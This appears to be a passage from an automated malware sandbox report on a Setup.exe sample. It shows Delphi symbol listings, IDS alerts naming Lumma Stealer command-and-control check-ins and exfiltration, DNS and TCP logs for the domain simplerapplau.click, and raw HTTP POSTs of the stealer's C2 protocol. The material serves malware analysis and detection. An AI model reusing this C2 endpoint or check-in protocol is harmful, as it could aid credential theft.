                                                                                                                      @Acdials@TacDialogWnd@IconRect$qqrv30500x67389c
                                                                                                                      @Acdials@TacDialogWnd@InitExBorders$qqrxo30490x673800
                                                                                                                      @Acdials@TacDialogWnd@InitParams$qqrv30140x66fffc
                                                                                                                      @Acdials@TacDialogWnd@KillAnimations$qqrv30520x6739c4
                                                                                                                      @Acdials@TacDialogWnd@MakeTitleBG$qqrv30150x670128
                                                                                                                      @Acdials@TacDialogWnd@OffsetX$qqrv30160x6701f0
                                                                                                                      @Acdials@TacDialogWnd@OffsetY$qqrv30170x67023c
                                                                                                                      @Acdials@TacDialogWnd@PaintAll$qqrv30180x670938
                                                                                                                      @Acdials@TacDialogWnd@PaintBorderIcons$qqrv30190x67170c
                                                                                                                      @Acdials@TacDialogWnd@PaintCaption$qqrxp5HDC__30290x671f68
                                                                                                                      @Acdials@TacDialogWnd@PaintForm$qqrrp5HDC__o30200x671b70
                                                                                                                      @Acdials@TacDialogWnd@PrepareTitleGlyph$qqrv30210x671c04
                                                                                                                      @Acdials@TacDialogWnd@RepaintButton$qqri30410x672ce4
                                                                                                                      @Acdials@TacDialogWnd@SendToAdapter$qqrrx17Messages@TMessage30340x672648
                                                                                                                      @Acdials@TacDialogWnd@SetHotHT$qqrio30380x672b54
                                                                                                                      @Acdials@TacDialogWnd@SetPressedHT$qqri30430x67346c
                                                                                                                      @Acdials@TacDialogWnd@ShadowSize$qqrv30510x67398c
                                                                                                                      @Acdials@TacDialogWnd@SysButtonWidth$qqrrx29Sskinprovider@TsCaptionButton30220x671d00
                                                                                                                      @Acdials@TacDialogWnd@TitleBtnsWidth$qqrv30230x671dac
                                                                                                                      @Acdials@TacDialogWnd@UpdateIconsIndexes$qqrv30310x672124
                                                                                                                      @Acdials@TacDialogWnd@VisibleClose$qqrv30240x671e20
                                                                                                                      @Acdials@TacDialogWnd@VisibleHelp$qqrv30250x671e34
                                                                                                                      @Acdials@TacDialogWnd@VisibleMax$qqrv30260x671e48
                                                                                                                      @Acdials@TacDialogWnd@VisibleMin$qqrv30270x671e5c
                                                                                                                      @Acdials@TacDialogWnd@VisibleRestore$qqrv30350x672674
                                                                                                                      @Acdials@TacDialogWnd@acWndProc$qqrr17Messages@TMessage30020x66ee40
                                                                                                                      @Acdials@TacProvider@29770x66ce44
                                                                                                                      @Acdials@TacProvider@$bctr$qqrp18Classes@TComponent29890x66e35c
                                                                                                                      @Acdials@TacProvider@$bdtr$qqrv29900x66e398
                                                                                                                      @Acdials@TacProvider@AddControl$qqrp6HWND__29880x66d91c
                                                                                                                      @Acdials@TacProvider@FindCtrlInList$qqrui29910x66e448
                                                                                                                      @Acdials@TacProvider@InitForm$qqrp17Forms@TCustomForm29920x66e490
                                                                                                                      @Acdials@TacProvider@InitHwndControls$qqrp6HWND__29930x66e4cc
                                                                                                                      @Acdials@TacProvider@InitSkin$qqrp6HWND__29940x66e52c
                                                                                                                      @Acdials@TacProvider@PrintHwndControls$qqrp6HWND__p5HDC__29950x66e650
                                                                                                                      @Acdials@TacSystemMenu@29730x66b9ec
                                                                                                                      @Acdials@TacSystemMenu@$bctr$qqrp18Classes@TComponent30540x673a84
                                                                                                                      @Acdials@TacSystemMenu@CloseClick$qqrp14System@TObject30530x673a1c
                                                                                                                      @Acdials@TacSystemMenu@EnabledMax$qqrv30550x673cd0
                                                                                                                      @Acdials@TacSystemMenu@EnabledMin$qqrv30560x673cd4
                                                                                                                      @Acdials@TacSystemMenu@EnabledMove$qqrv30570x673cd8
                                                                                                                      @Acdials@TacSystemMenu@EnabledRestore$qqrv30580x673cf4
                                                                                                                      @Acdials@TacSystemMenu@EnabledSize$qqrv30590x673cf8
                                                                                                                      @Acdials@TacSystemMenu@MaxClick$qqrp14System@TObject30600x673d24
                                                                                                                      @Acdials@TacSystemMenu@MinClick$qqrp14System@TObject30610x673d4c
                                                                                                                      @Acdials@TacSystemMenu@MoveClick$qqrp14System@TObject30620x673d68
                                                                                                                      @Acdials@TacSystemMenu@RestoreClick$qqrp14System@TObject30630x673d84
                                                                                                                      @Acdials@TacSystemMenu@SizeClick$qqrp14System@TObject30640x673dac
                                                                                                                      @Acdials@TacSystemMenu@UpdateItems$qqrv30650x673dc8
                                                                                                                      @Acdials@TacSystemMenu@VisibleClose$qqrv30660x673ecc
                                                                                                                      @Acdials@TacSystemMenu@VisibleMax$qqrv30670x673ee8
                                                                                                                      @Acdials@TacSystemMenu@VisibleMin$qqrv30680x673eec
                                                                                                                      @Acdials@TacSystemMenu@VisibleSize$qqrv30690x673ef0
                                                                                                                      @Acdials@UpdateRgn$qqrp20Acdials@TacDialogWndo30000x66eb50
                                                                                                                      @Acdials@VisibleDlgCount$qqrv29810x66d1b0
                                                                                                                      @Acdials@WndCallBack42270x9c9ad8
                                                                                                                      @Acdials@WndCallRet42280x9c9adc
                                                                                                                      @Acdials@acSupportedList42290x9c9ae0
                                                                                                                      @Acdials@fRect42300x9c9ae4
                                                                                                                      @Acdials@initialization$qqrv30730x674058
                                                                                                                      @Acglow@ClearGlows$qqrv29380x669a48
                                                                                                                      @Acglow@FBlend42200x9c9ab0
                                                                                                                      @Acglow@Finalization$qqrv29450x669f84
                                                                                                                      @Acglow@HideGlow$qqrxi29370x669a0c
                                                                                                                      @Acglow@ShowGlow$qqrrx11Types@TRectt1x20System@UnicodeStringt3xixip6HWND__p26Sskinmanager@TsSkinManager29360x6698e8
                                                                                                                      @Acglow@TacGlowEffect@29330x669658
                                                                                                                      @Acglow@TacGlowEffect@$bctr$qqrv29390x669a90
                                                                                                                      @Acglow@TacGlowEffect@$bdtr$qqrv29410x669b50
                                                                                                                      @Acglow@TacGlowEffect@CreateAlphaBmp$qqrxixi29400x669ab8
                                                                                                                      @Acglow@TacGlowEffect@IntBorderWidth$qqrv29420x669ba8
                                                                                                                      @Acglow@TacGlowEffect@NewWndProc$qqrr17Messages@TMessage29430x669bb0
                                                                                                                      @Acglow@TacGlowEffect@Show$qqrrx11Types@TRectt1xip6HWND__29440x669bd0
                                                                                                                      @Acglow@acgEffects42210x9c9ab4
                                                                                                                      @Acglow@initialization$qqrv29460x669fcc
                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      ChineseChina
                                                                                                                      EnglishUnited States
                                                                                                                      RussianRussia
                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-12-18T18:29:36.301287+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749738104.21.88.199443TCP
                                                                                                                      2024-12-18T18:29:39.998247+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749738104.21.88.199443TCP
                                                                                                                      2024-12-18T18:29:39.998247+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749738104.21.88.199443TCP
                                                                                                                      2024-12-18T18:29:41.250680+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749749104.21.88.199443TCP
                                                                                                                      2024-12-18T18:29:45.620212+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749749104.21.88.199443TCP
                                                                                                                      2024-12-18T18:29:45.620212+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749749104.21.88.199443TCP
                                                                                                                      2024-12-18T18:29:47.238820+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749764104.21.88.199443TCP
                                                                                                                      2024-12-18T18:29:50.238595+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749769104.21.88.199443TCP
                                                                                                                      2024-12-18T18:29:57.255718+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749784104.21.88.199443TCP
                                                                                                                      2024-12-18T18:30:03.299619+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749795104.21.88.199443TCP
                                                                                                                      2024-12-18T18:30:09.409773+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749805104.21.88.199443TCP
                                                                                                                      2024-12-18T18:30:13.913664+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749805104.21.88.199443TCP
                                                                                                                      2024-12-18T18:30:14.346117+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749819104.21.88.199443TCP
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 18, 2024 18:29:34.882766008 CET49738443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:34.882816076 CET44349738104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:34.882889986 CET49738443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:34.933284998 CET49738443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:34.933314085 CET44349738104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:36.301208973 CET44349738104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:36.301286936 CET49738443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:36.304568052 CET49738443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:36.304579020 CET44349738104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:36.304822922 CET44349738104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:36.392420053 CET49738443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:36.401725054 CET49738443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:36.401753902 CET49738443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:36.401842117 CET44349738104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:39.998250961 CET44349738104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:39.998331070 CET44349738104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:39.998522043 CET49738443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:40.000435114 CET49738443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:40.000478983 CET44349738104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:40.008415937 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:40.008439064 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:40.008519888 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:40.008795023 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:40.008805990 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:41.250592947 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:41.250679970 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:41.276011944 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:41.276027918 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:41.276308060 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:41.329917908 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:41.481429100 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:41.481501102 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:41.481533051 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.620254040 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.620419979 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.620517969 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.620599985 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.620615005 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:45.620651007 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.620661974 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:45.620755911 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.620856047 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.620889902 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:45.620897055 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.620959997 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:45.628403902 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.639709949 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.639765024 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.639821053 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:45.639847994 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.639930964 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:45.739423990 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.739550114 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.739615917 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:45.739727020 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:45.739738941 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.739749908 CET49749443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:45.739756107 CET44349749104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.948288918 CET49764443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:45.948328018 CET44349764104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:45.949368000 CET49764443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:45.949790955 CET49764443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:45.949805975 CET44349764104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:47.238744974 CET44349764104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:47.238820076 CET49764443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:47.245054960 CET49764443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:47.245064020 CET44349764104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:47.245294094 CET44349764104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:47.255634069 CET49764443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:47.256772995 CET49764443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:47.256824017 CET44349764104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:48.758301973 CET44349764104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:48.758543968 CET44349764104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:48.758590937 CET49764443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:48.758619070 CET49764443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:48.873852968 CET49769443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:48.873895884 CET44349769104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:48.873995066 CET49769443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:48.874351025 CET49769443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:48.874366045 CET44349769104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:50.238475084 CET44349769104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:50.238595009 CET49769443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:50.299211979 CET49769443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:50.299237013 CET44349769104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:50.299576998 CET44349769104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:50.315773010 CET49769443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:50.315907955 CET49769443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:50.315947056 CET44349769104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:50.316009998 CET49769443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:50.363326073 CET44349769104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:55.533662081 CET44349769104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:55.533785105 CET44349769104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:55.533859015 CET49769443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:55.533953905 CET49769443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:55.533971071 CET44349769104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:55.850528002 CET49784443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:55.850625992 CET44349784104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:55.850723982 CET49784443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:55.851018906 CET49784443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:55.851061106 CET44349784104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:57.255645037 CET44349784104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:57.255717993 CET49784443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:57.258505106 CET49784443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:57.258516073 CET44349784104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:57.258795023 CET44349784104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:57.260027885 CET49784443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:57.260169029 CET49784443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:57.260194063 CET44349784104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:57.260284901 CET49784443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:29:57.260293961 CET44349784104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:01.755976915 CET44349784104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:01.756084919 CET44349784104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:01.756160975 CET49784443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:01.756360054 CET49784443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:01.756381035 CET44349784104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:02.084142923 CET49795443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:02.084223032 CET44349795104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:02.084332943 CET49795443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:02.084678888 CET49795443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:02.084709883 CET44349795104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:03.299531937 CET44349795104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:03.299618959 CET49795443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:03.300872087 CET49795443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:03.300888062 CET44349795104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:03.301134109 CET44349795104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:03.302505970 CET49795443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:03.302578926 CET49795443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:03.302589893 CET44349795104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:08.065228939 CET44349795104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:08.065500975 CET49795443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:08.065516949 CET44349795104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:08.065572977 CET49795443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:08.187824011 CET49805443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:08.187868118 CET44349805104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:08.187967062 CET49805443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:08.188416958 CET49805443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:08.188433886 CET44349805104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:09.409693956 CET44349805104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:09.409773111 CET49805443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:09.411710978 CET49805443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:09.411717892 CET44349805104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:09.411947012 CET44349805104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:09.413630962 CET49805443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:09.413844109 CET49805443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:09.413851023 CET44349805104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:13.913721085 CET44349805104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:13.913958073 CET44349805104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:13.914071083 CET49805443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:13.914303064 CET49805443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:13.914320946 CET44349805104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:13.918821096 CET49819443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:13.918859959 CET44349819104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:13.918941021 CET49819443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:13.919241905 CET49819443192.168.2.7104.21.88.199
                                                                                                                      Dec 18, 2024 18:30:13.919258118 CET44349819104.21.88.199192.168.2.7
                                                                                                                      Dec 18, 2024 18:30:14.346117020 CET49819443192.168.2.7104.21.88.199
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 18, 2024 18:29:34.370351076 CET5177353192.168.2.71.1.1.1
                                                                                                                      Dec 18, 2024 18:29:34.779788971 CET53517731.1.1.1192.168.2.7
                                                                                                                      Dec 18, 2024 18:29:54.580832958 CET6143153192.168.2.71.1.1.1
                                                                                                                      Dec 18, 2024 18:29:54.719834089 CET53614311.1.1.1192.168.2.7
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 18, 2024 18:29:34.370351076 CET192.168.2.71.1.1.10x86b2Standard query (0)simplerapplau.clickA (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 18:29:54.580832958 CET192.168.2.71.1.1.10x96bfStandard query (0)simplerapplau.clickA (IP address)IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 18, 2024 18:29:34.779788971 CET1.1.1.1192.168.2.70x86b2No error (0)simplerapplau.click104.21.88.199A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 18:29:34.779788971 CET1.1.1.1192.168.2.70x86b2No error (0)simplerapplau.click172.67.152.160A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 18:29:54.719834089 CET1.1.1.1192.168.2.70x96bfNo error (0)simplerapplau.click104.21.88.199A (IP address)IN (0x0001)false
                                                                                                                      Dec 18, 2024 18:29:54.719834089 CET1.1.1.1192.168.2.70x96bfNo error (0)simplerapplau.click172.67.152.160A (IP address)IN (0x0001)false
                                                                                                                      • simplerapplau.click
                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.749738104.21.88.1994437128C:\Users\user\Desktop\Setup.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 17:29:36 UTC266OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 8
                                                                                                                      Host: simplerapplau.click
                                                                                                                      2024-12-18 17:29:36 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                      Data Ascii: act=life
                                                                                                                      2024-12-18 17:29:39 UTC1040INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 18 Dec 2024 17:29:39 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=6mrtln9mkfdige34nfnn7etilj; expires=Sun, 13-Apr-2025 11:16:16 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ARCskgmKNNS9kzqunmSrv80ToCjNj1RwzA6ZuXAG2bkCwnwxjUMxFtog%2Fu01huM2ngipBsqF2vrinUPbr2GwofdKBSHoRqqYiX6gX%2FGu6S5WvfLfYsvUzVGARroY%2FDMr67SQODpp"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8f40e0442a84184d-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=19923&min_rtt=1660&rtt_var=11566&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=1759036&cwnd=238&unsent_bytes=0&cid=0329426d61329c84&ts=3707&x=0"
                                                                                                                      2024-12-18 17:29:39 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                      Data Ascii: 2ok
                                                                                                                      2024-12-18 17:29:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.749749104.21.88.1994437128C:\Users\user\Desktop\Setup.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 17:29:41 UTC267OUTPOST /api HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                      Content-Length: 78
                                                                                                                      Host: simplerapplau.click
                                                                                                                      2024-12-18 17:29:41 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--VIKA&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                                      2024-12-18 17:29:45 UTC1035INHTTP/1.1 200 OK
                                                                                                                      Date: Wed, 18 Dec 2024 17:29:45 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Set-Cookie: PHPSESSID=g56vjs6q04qfjvpad0qmjkqgjc; expires=Sun, 13-Apr-2025 11:16:21 GMT; Max-Age=9999999; path=/
                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                      vary: accept-encoding
